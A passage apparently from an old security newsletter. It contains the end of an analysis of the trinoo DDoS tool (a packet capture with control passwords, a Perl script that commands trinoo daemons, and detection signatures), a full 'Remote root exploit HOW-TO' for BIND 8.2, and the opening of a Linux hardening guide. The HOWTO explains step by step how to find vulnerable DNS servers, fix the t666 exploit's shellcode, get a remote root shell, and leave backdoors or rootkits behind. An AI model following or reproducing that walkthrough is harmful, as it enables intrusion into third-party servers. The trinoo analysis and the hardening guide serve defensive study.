keeper " echo -n "arnudp " echo -n "nos " echo -n "nuclear " echo -n "ssping " echo -n "pingodeth " echo -n "smurf " echo -n "smurf4 " echo -n "land " echo -n "jolt " echo -n "pepsi " A tool like this has the advantage of allowing an attacker to give a single IP address and have multiple attacks be launched (increasing the probability of successful attack), but meant having to have pre-compiled versions of each individual exploit packaged up in a Unix "tar" format archive, etc., for convenient transfer to a (usually stolen) account from which to launch the attack. To still allow multiple denial of service exploits to be used, but with a single pre-compiled program that is more easy to store, transfer, and use quickly, programs like "targa.c" by Mixter were developed. Targa combines all of the following exploits in a single C source program: /* targa.c - copyright by Mixter version 1.0 - released 6/24/98 - interface to 8 multi-platform remote denial of service exploits */ . . . /* bonk by route|daemon9 & klepto * jolt by Jeff W. Roberson (modified by Mixter for overdrop effect) * land by m3lt * nestea by humble & ttol * newtear by route|daemon9 * syndrop by PineKoan * teardrop by route|daemon9 * winnuke by _eci */ Even combined denial of service tools like "targa" still only allow one attacker to hit one IP address at a time. To increase the effectiveness of the attack, groups of attackers, using IRC channels or telephone "voice bridges" for communication, could coordinate attacks, each person hitting a different system. This same coordination is being seen in probing for vulnerabilities, and in system compromise and control using multiple back doors and "root kits." Even this has its limits, so in less than two years, it appears the next logical step has been taken to combine the power of a number of compromised systems into a distributed "denial of service cluster." The "trinoo" tool is an example of this, as is another similar tool available in the computer underground called the "Tribe Flood Network" (or "TFN") by Mixter. While trinoo only implements UDP flood attacks, TFN supports ICMP flood, UDP flood, SYN flood, and Smurf style attacks, and is controlled via commands sent as ICMP_ECHOREPLY (ICMP Type 0) packets. It also employs Blowfish encryption, similar to trinoo. (TFN is analyzed in a separate paper). It is all but guaranteed that these tools will continue to follow this trend and evolve into truly robust, covert, and distributed denial of service attack tools that employ strong encryption of embedded strings, passwords to control execution (possibly with trip wires that self-destruct, or wipe the entire system disc, if run in the wrong way, or by the wrong person), using encrypted communication channels, and communicating using packets posing as protocols like ICMP that are difficult to detect or block by firewalls. -- David Dittrich http://staff.washington.edu/dittrich/ Appendix A: Example of network session captured with "ngrep" ------------------------------------------------------------ The following is an example of what an attack session would look like when viewed with "ngrep". ------------------------------------------------------------------------------ # ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444 interface: eth0 (192.168.0.200/255.255.255.0) filter: ip and ( tcp port 27665 or udp port 31335 or udp port 27444 ) match: .* # U 192.168.0.1:32892 -> 10.0.0.1:31335 2a 48 45 4c 4c 4f 2a *HELLO* # T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] ff f4 ff fd 06 ..... ###### T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] 62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a betaalmostdone.. # T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66 trinoo v1.07d2+f 33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53 3+c..[rpm8d/cb4S 78 2f 5d 0a 0a 0a x/]... ## T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 74 72 69 6e 6f 6f 3e 20 trinoo> ### T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] 62 63 61 73 74 0d 0a bcast.. # T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 4c 69 73 74 69 6e 67 20 42 63 61 73 74 73 2e 0a Listing Bcasts.. 0a . ### T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 31 39 32 2e 31 36 38 2e 30 2e 31 2e 20 20 20 0a 192.168.0.1. 0a 45 6e 64 2e 20 31 20 42 63 61 73 74 73 20 74 .End. 1 Bcasts t 6f 74 61 6c 2e 0a 74 72 69 6e 6f 6f 3e 20 otal..trinoo> ## T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] 6d 74 69 6d 65 72 20 31 30 30 30 0d 0a mtimer 1000.. ## T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20 mtimer: Setting 74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74 timer on bcast t 6f 20 31 30 30 30 2e 0a o 1000.. # U 10.0.0.1:1025 -> 192.168.0.1:27444 62 62 62 20 6c 34 34 61 64 73 6c 20 31 30 30 30 bbb l44adsl 1000 ## T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20 mtimer: Setting 74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74 timer on bcast t 6f 20 31 30 30 30 2e 0a o 1000.. ### T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 74 72 69 6e 6f 6f 3e 20 trinoo> ### T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] 6d 73 69 7a 65 20 33 32 30 30 30 0d 0a msize 32000.. # U 10.0.0.1:1025 -> 192.168.0.1:27444 72 73 7a 20 33 32 30 30 30 rsz 32000 # T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 74 72 69 6e 6f 6f 3e 20 trinoo> ### T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] 64 6f 73 20 32 31 36 2e 31 36 30 2e 58 58 2e 59 dos 216.160.XX.Y 59 0d 0a Y.. # T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 44 6f 53 3a 20 50 61 63 6b 65 74 69 6e 67 20 32 DoS: Packeting 2 31 36 2e 31 36 30 2e 58 58 2e 59 59 2e 0a 16.160.XX.YY.. # U 10.0.0.1:1025 -> 192.168.0.1:27444 61 61 61 20 6c 34 34 61 64 73 6c 20 32 31 36 2e aaa l44adsl 216. 31 36 30 2e 58 58 2e 59 59 160.XX.YY # T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 74 72 69 6e 6f 6f 3e 20 trinoo> ## T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP] 71 75 69 74 0d 0a quit.. # T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP] 62 79 65 20 62 79 65 2e 0a bye bye.. ### T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP] 62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a betaalmostdone.. ## T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP] 74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66 trinoo v1.07d2+f 33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53 3+c..[rpm8d/cb4S 78 2f 5d 0a 0a 0a x/]... ### T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP] 74 72 69 6e 6f 6f 3e 20 trinoo> ### T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP] 6d 70 69 6e 67 0d 0a mping.. ## T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP] 6d 70 69 6e 67 3a 20 53 65 6e 64 69 6e 67 20 61 mping: Sending a 20 50 49 4e 47 20 74 6f 20 65 76 65 72 79 20 42 PING to every B 63 61 73 74 73 2e 0a casts.. # U 10.0.0.1:1025 -> 192.168.0.1:27444 70 6e 67 20 6c 34 34 61 64 73 6c png l44adsl ## U 192.168.0.1:32894 -> 10.0.0.1:31335 50 4f 4e 47 PONG ## T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP] 74 72 69 6e 6f 6f 3e 20 50 4f 4e 47 20 31 20 52 trinoo> PONG 1 R 65 63 65 69 76 65 64 20 66 72 6f 6d 20 31 39 32 eceived from 192 2e 31 36 38 2e 30 2e 31 0a .168.0.1 ## T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP] 71 75 69 74 0d 0a quit.. # T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP] 62 79 65 20 62 79 65 2e 0a bye bye.. ------------------------------------------------------------------------------ Appendix B - trinot script -------------------------- ------------------------------- cut here ----------------------------------- #!/usr/bin/perl -w # # trinot v. 1.1 # By Dave Dittrich # # Send commands to trinoo daemon(s), causing them to PONG, *HELLO* # to all their masters, exit, etc. Using this program (and knowledge # of the proper daemon password), you can affect trinoo daemons # externally and monitor packets to verify if the daemons are up, # expose their masters, or shut them down. # # Needs Net::RawIP (http://quake.skif.net/RawIP) # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z) # # Example: ./trinot host1 [host2 [...]] # ./trinot -S host # ./trinot -p password -P host # # (This code was hacked from the "macof" program, written by # Ian Vitek ) require 'getopts.pl'; use Net::RawIP; $a = new Net::RawIP({udp => {}}); chop($hostname = `hostname`); Getopts('PSDp:f:s:d:l:i:vh'); die "usage: $0 [options] host1 [host2 [...]]\ \t-P\t\t\tSend \"png\" command\ \t-S\t\t\tSend \"shi\" command\ \t-D\t\t\tSend \"d1e\" command (default)\ \t-p password\t\t(default:\"l44adsl\") \t-f from_host\t\t(default:$hostname)\ \t-s src_port\t\t(default:random)\ \t-d dest_port\t\t(default:27444)\ \t-l ipfile\t\tSend to IP addresses in ipfile\ \t-i interface \t\tSet sending interface (default:eth0)\ \t-v\t\t\tVerbose\ \t-h This help\n" unless ( !$opt_h ); # set default values $opt_i = ($opt_i) ? $opt_i : "eth0"; $s_port = ($opt_s) ? $opt_s : int rand 65535; $d_port = ($opt_d) ? $opt_d : 27444; $pass = ($opt_p) ? $opt_p : "l44adsl"; # choose network card if($opt_e) { $a->ethnew($opt_i, dest => $opt_e); } else { $a->ethnew($opt_i); } $cmd = ($opt_P) ? "png $pass" : ($opt_S) ? "shi $pass" : ($opt_D) ? "d1e $pass" : "d1e $pass"; $s_host = ($opt_f) ? $opt_f : $hostname; if ($opt_l) { open(I,"<$opt_l") || die "could not open file: '$opt_l'"; while () { chop; push(@ARGV,$_); } close(I); } foreach $d_host (@ARGV) { $a->set({ip => {saddr => $s_host, daddr => $d_host}, udp => {source => $s_port, dest => $d_port, data => $cmd} }); print "sending '$cmd' to $d_host\n" if $opt_v; $a->send; } exit(0); ------------------------------- cut here ----------------------------------- Appendix C - References ----------------------- TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary R. Wright., Addison-Wesley. lsof: ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/ tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z hunt: http://www.cri.cz/kra/index.html sniffit: http://sniffit.rug.ac.be/sniffit/sniffit.html ngrep: http://www.packetfactory.net/ngrep/ loki client/server: Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ] http://www.phrack.com/search.phtml?view&article=p49-6 Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17 [ L O K I 2 (the implementation) ] http://www.phrack.com/search.phtml?view&article=p51-6 LibNet: http://www.packetfactory.net/libnet/ Net::RawIP: http://quake.skif.net/RawIP crack: http://www.crypto.dircon.co.uk/ Password cracking utilities: http://packetstorm.securify.com/Crackers/ targa.c: http://packetstorm.securify.com/exploits/DoS/targa.c Appendix D - Abbreviated report of actual trinoo attack. ------------------------------------------------------ The following is an abbreviated version the initial report sent out by Susan Levy Haskell of the University of Minnesota. This report, which only concerns a small time span in the three day attack, showed 227 unique attacking systems, 114 of which were at Internet 2 sites. (The actual list of attacking systems, all of which are also root compromised victims in their own right, have been removed. A complete report of all unique attacking IP addresses over the three day period is not available.) Just to show what a large trinoo network could do, consider that a file (named "owned.log") containing 888 IP addresses was found same location as the trinoo source code analyzed here (which is assumed to be the same code as that used for the attack). Another file in that directory (named "216") contains addresses of 10549 systems on 216.0.0.0/8 netblocks, and is assumed to be a list of potential targets for compromise and trinoo daemon/master installation. Rumors on Usenet newsgroups and Slashdot put the number of systems controlled by this group in the 3000+ range. ---------------------------------------------------------------------------- Hello: This is a notification that a system at your site apparently was used in a large-scale UDP flood on a system at the University of Minnesota. The hosts below have been involved in a series of escalating large-scale denials-of-service that are flooding the University of Minnesota off the internet. They are periodic, but expanding in the number of hosts used to attack. We would like to hear about it if you can confirm whether your system(s) were used. We're also *very* interested in any information about this tool (since it appears to be new, and quite effective). Thus far, all hosts used in this attack appear to have been Solaris 2.x systems that were compromised using the recently-announced rpc.cmsd exploits (see http://www.cert.org/advisories/CA-99-08-cmsd.html for details). The following are lists of hosts apparently used, and the period of use. We're certain about the timestamps--they're in CDT (-500)--but as with all such floods, they ramp up and tail off. Since we're getting data in ten-minute slices, the times are approximate. The floods use unforged source IPs and consistent UDP source-ports. The destination ports are random, aimed at 160.94.196.192. The packets are 32-byte UDP (and each flow represents many packets). I've included profile information below, rather than log excerpts, because these run to many GB. If you would like Cisco net-flow excerpts to demostrate the behavior, please reply to this message & ask. All attacks have been launched at 160.94.196.192 (irc2.tc.umn.edu). And, as I mentioned, all times are in CDT (-500) from an ntp-slaved log host (for the ten-minute segments). Thank you. -susan -- Susan B. Levy Haskell / sblh@nts.umn.edu / voice: (612) 626-8639 Security Incident Response Coordinator fax: (612) 626-1002 Networking and Telecommunications Services, University of Minnesota *** To report a security incident in progress, call (612) 625-0006 *** ================================================= Appendix E - Further methods of detecting trinoo ------------------------------------------------ Authors: David Brumley David Dittrich George Weaver Detecting Trinoo Currently Trinoo has several signatures that allow it to be detected from IP flow records. Trinoo Daemon (ns.c) - 1. The trinoo daemon by default listens to UDP port 27444 2. All communication with the trinoo daemon must have the string l44 (ell 44). 3. The SYN flood mechanism picks the destination port via the following algorithm: to.syn_port = htons(rand() % 65534) Several observations can be made: a. randomize()/srandom() is never called, so the destination port will always fit the following algorithm: SYN packet 1 has destination port x SYN packet 2 has destination port y as defined by srandom(x); y = rand(); SYN packet 3 has destination port z as defined by srandom(y); z = rand(); b. Since the port is a result of modulus 65534, destination port 0 will show up, while destination port 65535 will not. IDS detection of daemon: 1. Look for UDP connections to destination port 27444. This is indicative of the control session. 2. The string l44 will determine with a large probability that the packet is part of a trinoo control session. 3. Running trinoo DoS attacks (SYN Floods) can be identified by the algorithm given in 3 above. In addition, if you can catch the first SYN, it will *always* be the result of srand(1); rand();. On one authors laptop, an example sequence of destination ports would be: 32540 48264 58208 56084 46021 37263 6890 38941 17766 40714 Although this doesn't stop the Denial of Service, it will say with some probability this is a trinoo attack, and you should start looking for a master! Detecting the trinoo daemon on your network: 1. Trinoo daemons can be indexed by a master by sending a png command. Live daemons will respond with a PONG. The original author probably added this so the master can see which daemons are still alive. You can scan a network with the attached program for anything that responds appropriately (which chances are is a trinoo daemon). Trinoo Server (master.c) - The network communications that are indicative of a trinoo server are: 1. Sending UDP packets with destination port 27444 2. UDP packets as described above with the string l44adsl (ell 44 a d s ell) 3. A server will bind to port 27665 IDS detecting the trinoo server: 1. Look for flows with protocol type 17 (UDP) 2. TCP connections (protocol type 6) to destination port 27665 (the trinoo server) Detecting the Trinoo server of your network: 1. The server password hasn't changed (to the best of the authors knowledge), nor has the port it listens to. Trinoo possible masters can be detected by using a tool like nmap to find hosts listening to port 27665, i.e. nmap -PI -sT -p 27655 -m logfile "you.subnet.*.*" After a list of possible servers has been compiled, automated login can be used for positive identification. If you wish to script the automated login, try netcat (nc on most systems), i.e. echo "betaalmostdone" | nc 27665 NOTE: Your mileage may vary with the random number prediction since it's very host specific - what does rand() really return? Consult your documentation. @HWA 308.0 [IND] Remote root exploit HOW-TO by E-mind ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +-------------------------------------------------------+ |BIND 8.2 - 8.2.2 *Remote root Exploit How-To* by E-Mind| +-------------------------------------------------------+ (A) What is a DNS? 1. How do I query a DNS? 2. How do I find a vulnerable DNS? (B) How do I edit DNS entries? 1. How do I find a Zone file? 2. How do I edit a Zone file? (C) How do I exploit a vulnerable machine 1. What do I need to obtain before I could use the exploit? 2. What is the theory behind the exploit? 3. Where do I get the exploit from? 4. Why should I patch the exploit? 5. How do I patch the exploit? 6. How do I compile the exploit? 7. How do I run the exploit? 8. How do I make the vulnerable server make a query to my ip? 9. What should I do before I leave the shell? (D) Who should be credited for this HowTo? 1. Who is the person that motivated me into writing this? 2. Who am I? 3. Can I distribute/change this HowTo? 4. Final Credits and Greets :) Section A - What is a DNS? -------------------------- A DNS - Domain Name Server, is used to convert host names to IP addresses and IP addresses to host names. for example: www.infoseek.com = 204.162.96.173 1. How do I query a DNS? First of all, you should probably know that when you configure your TCP/IP and wish to use hostnames in your web browser to get to a web site, instead of typing the IP address of that site, you would need to configure a DNS server. You will get your DNS server IP address from your ISP. To make queries to the DNS server, Unix systems (and NT) has a tool calls "nslookup", the syntax of that tool is: $nslookup or $nslookup A properly configured DNS server contains two "lists" for a domain called the Zone files. One zone file is used for hostname to IP resolution, and the other is used for reverse lookup or IP to Hostname resolution. "nslookup" can be used in an interactive way, this is the way we will work with, as it is more powerful. Just type nslookup at the shell and press enter. You will get a ">" prompt, from which you can start typing in IP addresses and hostnames. There are some commands in nslookup which we will discuss later in this howto that will allow you to get some more information. 2. How do I find vulnerable systems? Remember, we will exploit Name Servers. We first need to find out the version of the DNS service that runs on a remote host. As well, we will need to know the Operating System, but there are many HowTo`s on that. We will use a tool called "dig", which is available on most Unix systems. The syntax looks like this: $dig @ version.bind chaos txt | grep \"8 look at the output. If you see: 8.2 or 8.2.1 or 8.2.2 then it is vulnerable. If you see 8.2.2P2 - P5, it is not. If you don't get an output and you just see your terminal stuck, it means that the DNS admin has probably edited the source so that the server won't give you this information. IT COULD BE VULNERABLE. Section B - How do I edit DNS entries? -------------------------------------- The first thing you should know is, DNS is only text files, and entries are added or changed by editing those text files and restarting the service. The main file that controls the DNS service is /etc/named.conf or /etc/named.boot. If /etc/named.conf exists, that is the file you should be working with. 1. How do I find a Zone file? As I said earlier, a properly configured DNS has two "lists" or zone files for each domain it serves. you will need to edit that zone file to change or add entries to that domain. A domain is for example, infoseek.com, and a hostname is www, the FQDN is www.infoseek.com. FQDN stands for Fully Qualified Domain Name. To find the zone file for FQDN to IP for infoseek.com domain, we should first query our DNS server to tell us what is the primary DNS for infoseek.com. This is how it is done: $nslookup Default Server: xxxxxx.xxxxxxx.xx.xx Address: xxx.xx.xx.xx >set q=ns >infoseek.com >infoseek.com nameserver = NS-UU.infoseek.com >NS-UU.infoseek.com internet address = 198.5.208.3 As you can see, now we have the ip address of the name server of infoseek.com. Let us suppose that we are root there. We SSH to their DNS, and locate the file /etc/named.conf We view the file and we see at the top an options section. there is a line there that says: directory "/var/named" This means, that the zone files will sit in /var/named. We further look down the file and we see some zone sections, We see a zone for infoseek.com which looks like: zone "infoseek.com"{ type master; file "infoseek.com.zone"; }; As we can understand now, the zone file is: /var/named/infoseek.com.zone, and that is the file which we should edit. 2. How do I edit a Zone file? First, let's take a look at that zone file. We see at the top a SOA record, which probably looks to you like a block of garbage text at the top. then, we see something like: @ IN NS NS-UU.infoseek.com. www IN A 204.192.96.173 ftp IN CNAME corp-bbn corp-bbn IN A 204.192.96.2 . . . As we can see, there are several types of records, for our exploit to work, we only need to focus on one record, which is NS. An A record is the typical Hostname to IP record type. CNAME is a Canonical Name, which is an Alias to an A record. A PTR record is a Pointer record, which is the oposit of A, it points IP addresses to FQDN`s. PTR`s are used in the "other" zone file. We will not discuss about it here but it is recommended that you read about DNS, there are many good books about DNS out there, read one. An NS record is a Name Server record type which says what is the Name Server for a specific domain or sub-domain. As you might have noticed, the NS record NS-UU.infoseek.com ends with a ".". This is because we specified the FQDN and not the hostname. When the period is omitted, the domain name is added after the hostname and if we where to omit the last period, it would be like we have said: NS-UU.infoseek.com.infoseek.com. So instead of: www IN A 204.192.96.173 we could write: www.infoseek.com. IN A 204.192.96.173 Which is the same thing. For our exploit to work, we will need to add a sub-domain to a name server on the net. So let's again suppose that we are root at NS-UU.infoseek.com. How do we add a sub-domain? We just need to add another NS record. subdomain IN NS hacker.box.com. this means that the name server of the domain subdomain.infoseek.com would be hacker.box.com. hacker.box.com needs to be resolved to a your machine's IP address, so enter your FQDN instead. Now, we need to restart the name server so the changes will take effect. initiate the following command: #/usr/sbin/ndc restart new pid is 24654 # Section C - How do I exploit a vulnerable machine ------------------------------------------------- 1. What do I need to obtain before I could use the exploit? First of all, 3 brain cells. ;p You will also need root privileges on a PRIMARY Name Server on the Internet which is Authoritative for a Domain on the net. Also, you will need a machine from which you will run the exploit. As for the DNS requirement, you could also ask someone that has root privileges on such a DNS, to edit the zone files for you. 2. What is the theory behind the exploit? The exploit uses a Buffed Overflow in BIND versions 8.2 - 8.2.2 to gain a remote root shell. The exploit binds to port 53 on the local machine, and acts as a DNS server. When someone queries it, it will send a large NXT record that contains code that will exploit the remote BIND server, provided that it is a vulnerable machine. To get more information on how Buffer Overflows work, *PLEASE* read Aleph One`s exelent article: Phrack 49 Article 14 - Smashing The Stack For Fun And Profit. URL: http://www.phrack.com/search.phtml?view&article=p49-14 3. Where do I get the exploit from? http://www.hack.co.za/daem0n/named/t666.c 4. Why should I patch the exploit? You might have heard that one needs to patch the exploit to make it work. This is because ADM thought only elite hax0rs should use their exploit and so, they planted a small "bug" in the code. What they actually did, is change the shell codes so that instead of running /bin/sh, the exploit will run /adm/sh. 5. How do I patch the exploit? As you may see, only a small change needs to be done in the code. / = 2F(HEX) ===> / = 2F(HEX) a = 61(HEX) ===> b = 62(HEX) d = 64(HEX) ===> i = 69(HEX) m = 6D(HEX) ===> n = 6E(HEX) / = 2F(HEX) ===> / = 2F(HEX) So, all we need to do, is search the source code for 0x2f,0x61,0x64,0x6d,0x2f and replace it with 0x2f,0x62,0x69,0x6e,0x2f Done. 6. How do I compile the exploit? As always: $gcc t666.c -o t666 $ 7. How do I run the exploit? $su Password: #./t666 1 Now the exploit is bound to port 53 (if you run a DNS server on the machine you want to run the exploit on, you must first kill the name server, use: #killall -9 named) The exploit is now waiting for queries, the second someone will query your exploit machine you will get an output: Received request from xxx.xx.xx.xx:1025 for xxx.xxxxxxxxx.xx.xx type=1 If it was a DNS server, it would enter a proxy loop, and if it is a vulnerable server, running on Linux Redhat 6.x - named 8.2/8.2.1 (from rpm) (this is because we chose architecture 1, type ./t666 without arguments and you will get a list of the architectures that the exploit will work on, I have tried it on Redhat linux only, so don't ask me why solaris doesn't work, I don't have a solaris to test it on, nor do I have the time to put more effort on this exploit.) You will get a remote root shell. 8. How do I make the vulnerable server make a query to my ip? This is very easy now, once you have added a subdomain in a name server on the net and made yourself its DNS, the only thing left to do, is query the vulnerable server for a host inside the added subdomain. $nslookup >server >www.subdomain.infoseek.com What will happen, is the server will ask, in this case NS-UU.infoseek.com for the IP of www.subdomain.infoseek.com. NS-UU.infoseek.com will start searching and will get to subdomain, because subdomain has its OWN NS record, it will tell that hacker.box.com. (your hostname in this case) is the Authoritative Name Server for subdomain.infoseek.com. Now, what will happen, is that will query hacker.box.com, for the ip address of www.subdomain.infoseek.com. BOOM! :) 9. What should I do before I leave the shell? When you exploit BIND, it will crash named, so you need to add some kind of a back door so you could log back in and restart it. *DO NOT TRY TO RESTART IT WHITHIN THE SHELL.* There are plenty of trojans and rootkits you could install on the server, I leave that to you. Section D - Who should be credited for this HowTo? -------------------------------------------------- 1. who is the person that motivated me into writing this? That person is no other the gov-boi, he operates the great site www.hack.co.za. Without him, this How-To would have never been writen! Thanks Gov-Boi :) 2. whoami? I am E-Mind, you can find me on IRC (EFNet) I am not giving away my E-Mail, and will not answer stupied questions. I think I have provided everything you need to RUN the exploit in this How-To. If not, and if you find errors, PLEASE /msg me on IRC. 3. can I distribute/change this HowTo? I take no responsibility for your actions. You are free to do whatever you want with this file *AS LONG AS "SECTION D" REMAINS UNTOUCHED* 4. Final Credits and Greets :) Credits: Gov-Boi - Keep up the good work man! ;p Aleph One - no other article out there explains buffer overflows better then yours! ADM - for writing this cool exploit. Greetz: #myth!, #!glich, #972, #darknet, #feed-the-goats - `sup guyz? ;] EOF 309.0 [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Preparing your linux box for the Internet Armoring Linux Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: 25 June, 2000 Organizations throughout the world are adopting Linux as their production platform. By connecting to the Internet to provide critical services, they also become targets of opportunity. To help protect these Linux systems, this article covers the basics of securing a Linux box. The examples provided here are based on Red Hat 6.0, but should apply to most Linux distributions. Installation The best place to start in armoring your system is at the beginning, OS installation. Since this is a production system, you cannot trust any previous installations. You want to start with a clean installation, where you can guarantee the system integrity. Place your system in an isolated network. At no time do you want to connect this box to an active network nor the Internet, exposing the system to a possible compromise. I personally witnessed a system hacked by a script kiddie within 15 minutes of connecting to the Internet. To get critical files and patches later, you will need a second box that acts as a go between. This second box will download files from the Internet, then connect to your isolated, configuration "network" to transfer critical files or burn the patches to a CDROM. Once you have placed your future Linux box in an isolated network, you are ready to begin. The first step is selecting what OS package to load. As of RH 6.0, you have three options, Workstation, Server, and Custom (default). I highly recommend Custom, as this allows you to choose what services are added and how the system is partitioned. The idea is to load the minimum packages, while maintaining maximum efficiency. The less software that resides on the box, the fewer potential security exploits or holes. This means if you do not need a News or Real Audio Server, don't install it. The nice thing about Linux is, if you change your mind, it is easy to add packages later. Regardless of which installation you choose, I would add the manual pages and HOWTO docs. I find the on-line man pages and docs to be a critical resource that add little risk to your system. If you selected Custom, you will be asked to partition your system. I always like to make root as big as possible and just throw everything in there, then you do not run out of room in the future. However, we do need several partitions to protect the root drive. If we were to fill the root partition with data, such as logging or email, we would cause a denial of service, potentially crashing the system. Therefore, I always recommend a separate partition for /var, this is where all the system logging and email goes. By isolating the /var partition, you protect your root partition from overfilling. I've found 400 MB to be more then enough for /var (increase this if your system will have alot of mail) . You may also consider making a separate partition for specific application purposes, especially applications that store extensive logging. If you are going to have users on your system you do not trust, you may also want to create a seperate /home directory, so malicious users cannot fille the / partition. For a standalone server, your partitions may look as follows: / - everything else /var - 400 MB swap - (I normally go with 256 MB) Once the system has rebooted after the installation, be sure to install the recommend security patches. For Red Hat, you can find these security patches at Red Hat's errata support site. Patches are critical to armoring a system and should always be updated. bugtraq@securityfocus.com or redhat-watch-list-request@redhat.com are excellent sources for following bugs and system patches. Without these patches, your system can be easily compromised. Be sure to use your go between box to get the patches, the Linux box should always remain on an isolated network. . For Red Hat, once you download the rpm, you can easily update your system using the following syntax. An excellent example of this is the security update for wu-ftpd rpm -Uvh wu-ftpd-2.6.0-14.6x.i386.rpm For systems that are already on-line, you can ftp the rpm and install it at the same time, using the following syntax. rpm -Uvh ftp://updates.redhat.com/6.1/i386/wu-ftpd-2.6.0-14.6x.i386.rpm As of RH 6.1, there is a new utility for patches called 'up2date'. I highly recommend you try this excellent utility. When ran on a local system, it determines which .rpm's need to be updated, gets those rpm's from Red Hats's web site, and then downloads and installs the updated files. This tool is highly customizable and easy to use. Eliminating Services Once you have loaded the installation package, patches, and rebooted, we are now ready to armor the operating system. Armoring consists mainly of turning off services, adding logging, tweaking several files, and configuring TCP Wrappers. First we will begin with turning off services. By default, Linux is a powerful operating system that executes many useful services. However, most of these services are unneeded and pose a potential security risk. The first place to start is /etc/inetd.conf. This file specifies which services the /usr/sbin/inetd daemon will listen for. By default, /etc/inetd.conf is configured for a variety of services, you most likely only need two, ftp and telnet. You eliminate the remaining unnecessary services by commenting them out (example A). This is critical, as many of the services run by inetd pose serious security threats, such as popd, imapd, and rsh. Confirm what you have commented out with the following command (this will show you all the services that were left uncommented) grep -v "^#" /etc/inetd.conf The next place to start are the .rc scripts, these scripts determine what services are started by the init process. For Red Hat, you will find these scripts in /etc/rc.d/rc3.d (or /etc/rc.d/rc5.d if you automatically boot to a GUI, such as Gnome or KDE). To stop a script from starting, replace the capital S with a small s. That way you can easily start the script again just by replacing the small s with a capital S. Or, if you prefer, Red Hat comes with a great utility for turning off these services. Just type "/usr/sbin/setup" at the command prompt, and select "System Services", from there you can select what scripts are started during the boot up process. Another option is chkconfig, which you will find on most distributions. The following startup scripts may be installed by default but are not critical to system functioning. If you don't need them, turn these scripts off. The numbers in the names determine the sequence of initialization, they may vary based on your distribution and version. Scripts that start with a capital K instead of a captial S are used to kill services that are already running. S05apmd (You only need this for laptops) S10xntpd (Network time protocol) S11portmap (Required if you have any rpc services, such as NIS or NFS) S15sound (Saves sound cared settings) S15netfs (This is the nfs client, used for mounting filesystems from a nfs server) S20rstatd (Try to avoid running any r services, they provide too much information to remote users) S20rusersd S20rwhod S20rwalld S20bootparamd (Used for diskless clients, you probably don't need this vulnerable service) S25squid (Proxy server) S34yppasswdd (Required if you are a NIS server, this is an extremely vulnerable service) S35ypserv (Required if you are a NIS server, this is an extremely vulnerable service) S35dhcpd (Starts dhcp server daemon) S40atd (Used for the at service, similar to cron, by not required by the system) S45pcmcia (You only need this script for laptops) S50snmpd (SNMP daemon, can give remote users detailed information about your system) S55named (DNS server. If you are setting up DNS, upgrade to the latest version of BIND, http://www.isc.org/bind.html) S55routed (RIP, don't run this unless you REALLY need it) S60lpd (Printing services) S60mars-nwe (Netware file and print server) S60nfs (Use for NFS server, do not run unless you absolutely have to). S72amd (AutoMount daemon, used to mount remote file systems) S75gated (used to run other routing protocols, such as OSPF) S80sendmail (You can still send email if you turn this script off, you just will not be able to receive or relay) S85httpd (Apache webserver, I recommend you upgrade to the latest version, http://www.apache.org) S87ypbind (Required if you are a NIS client) S90xfs (X font server) S95innd (News server) S99linuxconf (Used to remotely configure Linux systems via browser, every black-hat's dream :) To see how many services are running before you change the startup scripts, type ps aux | wc -l Once you are done with the installation and have turned off the startup scripts, type the command again and compare how the number of services have decreased. The fewer services running, the better. Also, confirm which are left running by executing the following command: netstat -na --ip Logging and Tweaking Once you have eliminated as many services as possible, we want to enable logging. All system logging occurs in /var/log. By default, Linux has excellent logging, except for ftp. You have two options for logging for ftp, configure /etc/ftpaccess file or edit /etc/inetd.conf. I prefer to edit /etc/inetd.conf, as it is simpler 